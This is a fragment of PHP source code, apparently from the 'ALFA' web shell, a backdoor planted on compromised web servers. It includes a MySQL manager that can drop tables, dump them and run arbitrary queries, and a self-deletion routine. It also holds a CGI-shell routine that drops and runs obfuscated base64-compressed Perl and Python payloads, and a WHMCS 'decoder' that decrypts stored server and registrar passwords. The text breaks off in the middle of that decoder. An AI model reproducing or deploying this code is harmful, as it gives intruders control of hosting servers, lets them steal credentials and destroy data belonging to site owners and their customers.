                if ($db["mode"] == "drop") {
                    foreach ($db["tables"] as $table) {
                        @mysqli_query($conn, "DROP TABLE `" . $table . "`;");
                    }
                    $tables = array();
                    $q_tables = @mysqli_query($conn, "SHOW TABLES;");
                    $count = 0;
                    while ($row = @mysqli_fetch_array($q_tables)) {
                        if ($sql_count) {
                            $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `' . $row[0] . '`');
                            if ($count_q) {
                                $count = @mysqli_fetch_row($count_q);
                                $count = $count[0];
                            }
                        }
                        $tables[] = array("name" => $row[0], "count" => (int) $count);
                    }
                    echo @json_encode($tables);
                } else {
                    if (strlen(alfaEx("mysqldump")) > 0) {
                        alfaEx("mysqldump --single-transaction --host=\"" . $db["host"] . "\" --user=\"" . $db["user"] . "\" --password=\"" . $db["pass"] . "\" " . $db["db"] . " " . implode(" ", $db["tables"]) . "  > " . $db["dump_file"]);
                    } else {
                        $fp = @fopen($db["dump_file"], "w");
                        foreach ($db["tables"] as $table) {
                            $res = @mysqli_query($conn, 'SHOW CREATE TABLE `' . $table . '`');
                            $create = @mysqli_fetch_array($res);
                            $sql = "DROP TABLE IF EXISTS `" . $table . "`;\n" . $create[1] . ";\n";
                            if ($fp) {
                                fwrite($fp, $sql);
                            } else {
                                echo $sql;
                            }
                            $tbl_data = @mysqli_query($conn, 'SELECT * FROM `' . $table . '`');
                            $head = true;
                            while ($item = @mysqli_fetch_assoc($tbl_data)) {
                                $columns = array();
                                foreach ($item as $k => $v) {
                                    if ($v == null) {
                                        $item[$k] = "''";
                                    } elseif (is_numeric($v)) {
                                        $item[$k] = $v;
                                    } else {
                                        $item[$k] = "'" . @mysqli_real_escape_string($conn, $v) . "'";
                                    }
                                    $columns[] = "`" . $k . "`";
                                }
                                if ($head) {
                                    $sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
                                    $head = false;
                                } else {
                                    $sql = "\n\t,(" . implode(", ", $item) . ')';
                                }
                                if ($fp) {
                                    fwrite($fp, $sql);
                                } else {
                                    echo $sql;
                                }
                            }
                            if (!$head) {
                                if ($fp) {
                                    fwrite($fp, ";\n\n");
                                } else {
                                    echo ";\n\n";
                                }
                            }
                        }
                    }
                    echo @json_encode(array("status" => true, "file" => $db["dump_file"]));
                }
            } elseif ($type == "load_tables") {
                $tables = array();
                $q_tables = @mysqli_query($conn, "SHOW TABLES;");
                $count = 0;
                while ($row = @mysqli_fetch_array($q_tables)) {
                    if ($sql_count) {
                        $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `' . $row[0] . '`');
                        if ($count_q) {
                            $count = @mysqli_fetch_row($count_q);
                            $count = $count[0];
                        }
                    }
                    $tables[] = array("name" => $row[0], "count" => (int) $count);
                }
                echo @json_encode($tables);
            } elseif ($type == "alter") {
                $db["alter"]["type"] = strtolower($db["alter"]["type"]);
                $inputs = $db["alter"]["type"] . "(" . $db["alter"]["input"] . ")";
                $text_input = array("longtext", "text", "mediumtext", "tinytext");
                if (in_array($db["alter"]["type"], $text_input)) {
                    $inputs = $db["alter"]["type"];
                }
                @mysqli_query($conn, "ALTER TABLE `" . $db["table"] . "` MODIFY COLUMN `" . $db["column"] . "` " . $inputs);
                $error = @mysqli_error($conn);
                if ($error) {
                    echo $error;
                } else {
                    echo "ok";
                }
            } elseif ($type == "edit" || $type == "delete" || $type == "delete_all") {
                if ($type == "edit") {
                    $q = @mysqli_query($conn, "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` = '" . addslashes($db["key"]) . "' LIMIT 0,1");
                    $row = @mysqli_fetch_assoc($q);
                    if ($row) {
                        $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'");
                        $columns = array();
                        $edit_data = array();
                        while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
                            $input = array("col_type" => $row2["COLUMN_TYPE"]);
                            $row2["type"] = strtolower($row2["type"]);
                            switch ($row2["type"]) {
                                case "longtext":
                                case "text":
                                case "mediumtext":
                                case "tinytext":
                                    $input["tag"] = "textarea";
                                    break;
                                case "int":
                                case "smallint":
                                case "bigint":
                                case "tinyint":
                                case "mediumint":
                                    $input["tag"] = "input";
                                    $input["type"] = "number";
                                    break;
                                default:
                                    $input["tag"] = "input";
                                    $input["type"] = "text";
                            }
                            $columns[$row2["name"]] = $input;
                        }
                        foreach ($row as $key => $v) {
                            $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]);
                        }
                        echo @json_encode($edit_data);
                    }
                } else {
                    if ($type == "delete_all") {
                        $rows = implode("', '", $db["rows"]);
                    } else {
                        $rows = addslashes($db["key"]);
                    }
                    $query = "DELETE FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` IN ('" . $rows . "')";
                    @mysqli_query($conn, $query);
                    $error = @mysqli_error($conn);
                    if ($error) {
                        $status = false;
                    } else {
                        $status = true;
                    }
                    echo @json_encode(array("status" => $status, "error" => $error, "query" => $query));
                }
            } elseif ($type == "update") {
                $query = "UPDATE `" . $db["db"] . "`.`" . $db["table"] . "` SET ";
                foreach ($db["data"] as $col => $val) {
                    $query .= "`" . $col . "` = '" . mysqli_real_escape_string($conn, $val) . "',";
                }
                $query = substr($query, 0, -1);
                $query .= "WHERE `" . $db["col_key"] . "` = '" . $db["key"] . "'";
                $res = @mysqli_query($conn, $query);
                echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
            } elseif ($type == "insert") {
                $query = "INSERT INTO `" . $db["db"] . "`.`" . $db["table"] . "` ";
                foreach ($db["data"] as $col => $val) {
                    $cols .= $col . ",";
                    $vals .= "'" . mysqli_real_escape_string($conn, $val) . "',";
                }
                $cols = substr($cols, 0, -1);
                $vals = substr($vals, 0, -1);
                $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
                $res = @mysqli_query($conn, $query);
                echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));
            } else {
                $pages = 0;
                $title = false;
                $query = "";
                $tbl_content = '<table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
                $line = 0;
                $tables = array();
                $columns = array();
                if ($type == "load_data") {
                    $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT 0,30";
                    $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $db["db"] . "`.`" . $db["table"] . "`");
                    $tbl_count = @mysqli_fetch_row($tbl_count_q);
                    $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'");
                    while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
                        $columns[] = $row2;
                    }
                    if ($tbl_count[0] > 30) {
                        $pages = ceil($tbl_count[0] / 30);
                    }
                } elseif ($type == "query") {
                    $query = $db["query"];
                } elseif ($type == "page") {
                    $db["page"] = (int) $db["page"] - 1;
                    $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT " . $db["page"] * 30 . ",30";
                } elseif ($type == "search") {
                    $search = "";
                    $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
                    foreach ($db["search"] as $col => $val) {
                        $search_noval_r = in_array($val["opt"], $search_noval);
                        if (empty($val["value"]) && !$search_noval_r) {
                            continue;
                        }
                        if (strstr($val["opt"], "...") || $search_noval_r) {
                            $val["opt"] = str_replace("...", $val["value"], $val["opt"]);
                            $search .= $col . " " . $val["opt"] . " AND ";
                        } else {
                            $search .= $col . " " . $val["opt"] . " '" . addslashes($val["value"]) . "' AND ";
                        }
                    }
                    $search .= "1=1";
                    $query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE " . $search;
                }
                $q_tables = @mysqli_query($conn, $query);
                if (!$q_tables) {
                    echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
                    return false;
                }
                $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($db["db"]) . "' AND TABLE_NAME = '" . @addslashes($db["table"]) . "' AND COLUMN_KEY = 'PRI'");
                if ($col_key) {
                    $col_key = @mysqli_fetch_row($col_key);
                    $col_key = $col_key[0];
                    if (!empty($col_key)) {
                        $tbl_content = '<div style="margin-bottom:5px;margin-top:5px;"><button col_key="' . $col_key . '" tbl_name="' . $db["table"] . '" db_id="' . $db["db_id"] . '" 	db_target="' . $db["db"] . '" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
                    }
                } else {
                    $col_key = false;
                }
                while ($item = @mysqli_fetch_assoc($q_tables)) {
                    if (!$title) {
                        $tbl_content .= '<tr style="background-color:#305b8e;">';
                        if ($col_key) {
                            $tbl_content .= '<th style="width: 55px;text-align:center;"><input db_id="' . $db["db_id"] . '" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>';
                        }
                        foreach ($item as $key => $value) {
                            $tbl_content .= '<th>' . $key . '</th>';
                        }
                        reset($item);
                        $title = true;
                        $tbl_content .= '</tr><tr>';
                    }
                    if ($col_key) {
                        $cacheMsg = '<td style="text-align:center;"><input row_id="' . $line . '" type="checkbox" name="tbl_rows_checkbox[]" value="' . $item[$col_key] . '"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="' . $db["db_id"] . '" db_target="' . $db["db"] . '" tbl_name="' . $db["table"] . '" col_key="' . $col_key . '" key="' . $item[$col_key] . '" onclick="alfaMysqlEditRow(this, \'edit\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="' . $db["db_id"] . '" db_target="' . $db["db"] . '" tbl_name="' . $db["table"] . '" col_key="' . $col_key . '" key="' . $item[$col_key] . '" row_id="' . $line . '" onclick="alfaMysqlEditRow(this, \'delete\');" style="color:#ff1e1e;">Delete</a></td>';
                    }
                    $tbl_content .= '<tr class="tbl_row tbl_row_l' . $line . '">' . $cacheMsg;
                    $line++;
                    foreach ($item as $key => $value) {
                        if ($value == null) {
                            $tbl_content .= '<td><i>null</i></td>';
                        } else {
                            $tbl_content .= '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
                        }
                    }
                    $tbl_content .= '</tr>';
                }
                $tbl_content .= '</table>';
                if (!$title) {
                    $tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>";
                }
                echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
            }
            @mysqli_close($conn);
        }
    }
    function alfaselfrm()
    {
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'yes') {
            echo __pre() . '<center>';
            if (@unlink($GLOBALS['__file_path'])) {
                echo "<b>Shell has been removed</i> :)</b>";
            } else {
                echo "unlink error!";
            }
            echo "</center>";
        }
        if (isset($_POST['alfa1']) && $_POST['alfa1'] != 'yes') {
            echo "<div class=header>";
            echo "\r\n<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
            echo "<p><div class=\"txtfont\">Do you want to destroy me?!</div><a href=javascript:void(0) onclick=\"g('selfrm',null,'yes');\"> Yes</a>";
            echo "</p></center></div>";
        }
    }
    function alfacgishell()
    {
        alfahead();
        $div = "";
        alfaCreateParentFolder();
        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        if (!in_array($_POST['alfa1'], array('perl', 'py'))) {
            $div = "</div>";
            echo "<div class=header><center><p><div class=\"txtfont_header\">| CGI Shell |</div></p><h3><a class=\"rejectme\" href=\"javascript:void(0)\" onclick=\"runcgi('perl')\">| Perl | </a><a class=\"rejectme\" href=\"javascript:void(0)\" onclick=\"runcgi('py');\">| Python | </a>";
        }
        if (isset($_POST['alfa1']) && in_array($_POST['alfa1'], array('perl', 'py'))) {
            @mkdir('cgialfa', 0755);
            @chdir('cgialfa');
            alfacgihtaccess('cgi');
            $name = $_POST['alfa1'] . '.alfa';
            $perl = "#!/usr/bin/perl   -I/usr/local/bandmin\nuse MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));";
            $py = "#!/usr/bin/python\nimport zlib, base64\neval(compile(zlib.decompress(base64.b64decode(\"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\")),'<string>','exec'))";
            if ($_POST['alfa1'] == 'perl') {
                $code = $perl;
            } else {
                $code = $py;
            }
            if (__write_file($name, $code)) {
                @chmod($name, 0755);
                echo "<iframe src=\"ALFA_DATA/cgialfa/" . $name . '" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
            }
        }
        echo $div;
        alfafooter();
    }
    function alfaWhmcs()
    {
        alfahead();
        echo "<div class=header>";
        function decrypt($string, $cc_encryption_hash)
        {
            $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
            $hash_key = _hash($key);
            $hash_length = strlen($hash_key);
            $string = __ZGVjb2Rlcg($string);
            $tmp_iv = substr($string, 0, $hash_length);
            $string = substr($string, $hash_length, strlen($string) - $hash_length);
            $iv = $out = '';
            $c = 0;
            while ($c < $hash_length) {
                $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
                ++$c;
            }
            $key = $iv;
            $c = 0;
            while ($c < strlen($string)) {
                if ($c != 0 and $c % $hash_length == 0) {
                    $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
                }
                $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
                ++$c;
            }
            return $out;
        }
        function _hash($string)
        {
            if (function_exists('sha1')) {
                $hash = sha1($string);
            } else {
                $hash = md5($string);
            }
            $out = '';
            $c = 0;
            while ($c < strlen($hash)) {
                $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
                $c += 2;
            }
            return $out;
        }
        AlfaNum(8, 9, 10);
        echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml('whmcs') . "</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">\r\n<input type='hidden' name='form_action' value='2'>";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
        if ($_POST['alfa5'] != '') {
            $db_host = $_POST['alfa7'];
            $db_username = $_POST['alfa3'];
            $db_password = $_POST['alfa4'];
            $db_name = $_POST['alfa5'];
            $cc_encryption_hash = $_POST['alfa6'];
            echo __pre();
            $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn));
            $query = mysqli_query($conn, "SELECT * FROM tblservers");
            $num = mysqli_num_rows($query);
            if ($num > 0) {
                for ($i = 0; $i <= $num - 1; $i++) {
                    $v = @mysqli_fetch_array($query);
                    $ipaddress = $v['ipaddress'];
                    $username = $v['username'];
                    $type = $v['type'];
                    $active = $v['active'];
                    $hostname = $v['hostname'];
                    echo "<center><table border='1'>";
                    $password = decrypt($v['password'], $cc_encryption_hash);
                    echo "<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>{$type}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>{$active}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>{$hostname}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>{$ipaddress}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>{$username}</td></tr></b>";
                    echo "<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>{$password}</td></tr></b>";
                    echo "</table><br><br></center>";
                }
                $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars");
                $num1 = @mysqli_num_rows($query1);
                if ($num1 > 0) {
                    for ($i = 0; $i <= $num1 - 1; $i++) {
                        $v = mysqli_fetch_array($query1);
                        $registrar = $v['registrar'];
                        $setting = $v['setting'];
                        $value = decrypt($v['value'], $cc_encryption_hash);
                        if ($value == "") {
                            $value = 0;
                        }
